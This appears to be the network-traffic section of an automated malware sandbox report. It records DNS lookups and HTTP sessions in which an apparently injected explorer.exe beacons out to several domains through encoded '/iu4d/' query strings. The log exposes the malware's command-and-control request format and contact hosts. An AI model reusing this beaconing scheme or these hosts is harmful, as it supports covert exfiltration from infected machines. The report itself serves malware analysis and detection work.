                                                                  Apr 12, 2021 10:04:17.126185894 CEST8.8.8.8192.168.2.70x1742No error (0)hotlightexpens.fun54.237.125.12A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:22.615638018 CEST8.8.8.8192.168.2.70x66c6No error (0)www.theartsutra.com142.111.76.118A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:28.445403099 CEST8.8.8.8192.168.2.70xfaf3No error (0)www.chestfreezersale.xyz172.67.130.43A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:28.445403099 CEST8.8.8.8192.168.2.70xfaf3No error (0)www.chestfreezersale.xyz104.21.3.36A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:33.948719978 CEST8.8.8.8192.168.2.70xd76dNo error (0)www.loktantratvnews.comloktantratvnews.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 12, 2021 10:04:33.948719978 CEST8.8.8.8192.168.2.70xd76dNo error (0)loktantratvnews.com148.66.136.150A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:39.647254944 CEST8.8.8.8192.168.2.70xe518No error (0)www.getboostphlo.com172.67.219.254A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:39.647254944 CEST8.8.8.8192.168.2.70xe518No error (0)www.getboostphlo.com104.21.70.50A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:04:45.270700932 CEST8.8.8.8192.168.2.70x953fNo error (0)www.ux300e.com52.58.78.16A (IP address)IN (0x0001)
                                                                  Apr 12, 2021 10:05:06.754046917 CEST8.8.8.8192.168.2.70x3379Server failure (2)www.rosewoodcibubur.comnonenoneA (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.emmajanetracy.com
                                                                  • www.okitmall.com
                                                                  • www.moretuantired.com
                                                                  • www.betbonusuk.com
                                                                  • www.weluvweb.com
                                                                  • www.warungjitu.com
                                                                  • www.appearwood.club
                                                                  • www.theartsutra.com
                                                                  • www.chestfreezersale.xyz

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.749705192.0.78.2580C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:23.076253891 CEST1368OUTGET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1
                                                                  Host: www.emmajanetracy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:23.117110968 CEST1372INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:03:23 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                                                  X-ac: 2.hhn _dfw
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.74971115.165.26.25280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:45.298271894 CEST1447OUTGET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1
                                                                  Host: www.okitmall.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:45.601017952 CEST1448INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 12 Apr 2021 08:03:45 GMT
                                                                  Server: Apache
                                                                  X-Powered-By: PHP/5.6.36
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Cache-Control: No-Cache
                                                                  Connection: close
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 31 65 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 9d b4 eb a6 84 ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 20 20 20 20 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 83 9d eb 85 84 ec 9b 94 ec 9d bc ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4
                                                                  Data Ascii: 1e04<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert(' .');f.agree.focus();return false;}if (f.customer_name.value == ""){alert(' .');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.74971881.17.18.19880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:50.758109093 CEST1488OUTGET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1
                                                                  Host: www.moretuantired.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:50.822356939 CEST1490INHTTP/1.1 200 OK
                                                                  cache-control: max-age=0, private, must-revalidate
                                                                  connection: close
                                                                  content-length: 584
                                                                  content-type: text/html; charset=utf-8
                                                                  date: Mon, 12 Apr 2021 08:03:50 GMT
                                                                  server: nginx
                                                                  set-cookie: sid=9de5d662-9b65-11eb-8f4c-2dd5d5311804; path=/; domain=.moretuantired.com; expires=Sat, 30 Apr 2089 11:17:57 GMT; max-age=2147483647; HttpOnly
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 6f 72 65 74 75 61 6e 74 69 72 65 64 2e 63 6f 6d 2f 69 75 34 64 2f 3f 4a 36 41 3d 74 30 25 32 46 65 68 42 36 25 32 46 4c 56 76 48 59 55 31 30 53 70 51 47 42 68 55 47 72 69 6e 55 4f 65 61 76 33 51 71 4b 58 72 79 34 35 34 72 63 4d 69 74 25 32 46 35 72 6c 53 47 63 59 36 48 68 77 31 37 39 66 67 2b 57 55 56 37 73 38 53 47 67 25 33 44 25 33 44 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4f 44 49 79 4d 54 67 7a 4d 43 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 34 4d 6a 45 30 4e 6a 4d 77 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 48 46 6e 63 6a 68 6e 5a 6e 52 30 5a 58 4e 6d 4f 47 39 72 5a 57 4d 77 62 47 6c 6e 61 32 73 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 67 79 4d 54 51 32 4d 7a 41 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 34 4d 6a 45 30 4e 6a 4d 77 4f 44 45 79 4e 6a 6b 31 66 51 2e 47 2d 76 73 63 79 6f 68 65 79 38 6f 6e 30 39 4e 4a 62 42 68 35 70 33 39 77 6b 4a 68 64 31 78 70 41 5f 37 55 4d 68 42 30 55 61 77 26 73 69 64 3d 39 64 65 35 64 36 36 32 2d 39 62 36 35 2d 31 31 65 62 2d 38 66 34 63 2d 32 64 64 35 64 35 33 31 31 38 30 34 26 75 56 6a 4c 3d 4d 36 4e 48 70 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.moretuantired.com/iu4d/?J6A=t0%2FehB6%2FLVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit%2F5rlSGcY6Hhw179fg+WUV7s8SGg%3D%3D&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxODIyMTgzMCwiaWF0IjoxNjE4MjE0NjMwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycHFncjhnZnR0ZXNmOG9rZWMwbGlna2siLCJuYmYiOjE2MTgyMTQ2MzAsInRzIjoxNjE4MjE0NjMwODEyNjk1fQ.G-vscyohey8on09NJbBh5p39wkJhd1xpA_7UMhB0Uaw&sid=9de5d662-9b65-11eb-8f4c-2dd5d5311804&uVjL=M6NHp');</script></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.749719104.21.7.6780C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:03:55.992831945 CEST5275OUTGET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1
                                                                  Host: www.betbonusuk.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:03:56.058897972 CEST5276INHTTP/1.1 301 Moved Permanently
                                                                  Date: Mon, 12 Apr 2021 08:03:56 GMT
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=3600
                                                                  Expires: Mon, 12 Apr 2021 09:03:56 GMT
                                                                  Location: https://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ==
                                                                  cf-request-id: 0966b4e1fe00002c824a157000000001
                                                                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zksz97DotkzONKWrHGxfhMn0mjrpmB5IH3F2SIvN01qHstmEka6bp6V3jnPqP619zf4X3H%2BzftPL2h65voLtQveDO4QV0xGAnOUxmKXr2CvZh90%3D"}],"max_age":604800}
                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                  Server: cloudflare
                                                                  CF-RAY: 63eaf0e338e42c82-LHR
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.74972052.56.126.2680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:01.201181889 CEST5277OUTGET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1
                                                                  Host: www.weluvweb.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:01.253669024 CEST5278INHTTP/1.1 401 Unauthorized
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:04:01 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 172
                                                                  Connection: close
                                                                  WWW-Authenticate: Basic realm="Restricted Content"
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-XSS-Protection: 1; mode=block
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Content-Security-Policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval';
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>401 Authorization Required</title></head><body><center><h1>401 Authorization Required</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.7497213.13.255.15780C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:06.577115059 CEST5280OUTGET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1
                                                                  Host: www.warungjitu.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:06.714777946 CEST5280INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 12 Apr 2021 08:04:06 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 153
                                                                  Connection: close
                                                                  Server: nginx/1.16.1
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.74973452.206.71.22080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:17.254053116 CEST6138OUTGET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1
                                                                  Host: www.appearwood.club
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:17.381587029 CEST6158INHTTP/1.1 502 Bad Gateway
                                                                  Server: openresty/1.15.8.3
                                                                  Date: Mon, 12 Apr 2021 08:04:17 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 0
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.749735142.111.76.11880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:22.810084105 CEST6174OUTGET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1
                                                                  Host: www.theartsutra.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.749736172.67.130.4380C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:28.499571085 CEST6202OUTGET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1
                                                                  Host: www.chestfreezersale.xyz
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:28.859160900 CEST6203INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 12 Apr 2021 08:04:28 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: __cfduid=d539d58d2bef24b0ad4345217a6c1ca9c1618214668; expires=Wed, 12-May-21 08:04:28 GMT; path=/; domain=.chestfreezersale.xyz; HttpOnly; SameSite=Lax
                                                                  accept-ranges: bytes
                                                                  CF-Cache-Status: DYNAMIC
                                                                  cf-request-id: 0966b560fa000006b2230ea000000001
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sVWI7jUSxielKSjGjJx1VmKTHjQ2vbIlNcFeqq0CvvoL%2B%2FqGEalcFF%2FnzrvqTnYo%2Bw2aSzG8hdHANa2R9bPcDrVWOCkZIAVJINbJwHDmMt5DcCrCTeq89kY%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                  Server: cloudflare
                                                                  CF-RAY: 63eaf1ae5d2a06b2-LHR
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Raw: 32 39 61 30 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65
                                                                  Data Ascii: 29a0<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-he


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.749741192.0.78.2580C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 12, 2021 10:04:50.410053968 CEST6232OUTGET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1
                                                                  Host: www.emmajanetracy.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 12, 2021 10:04:50.450371027 CEST6233INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Mon, 12 Apr 2021 08:04:50 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: close
                                                                  Location: https://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                                                  X-ac: 2.hhn _dfw
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
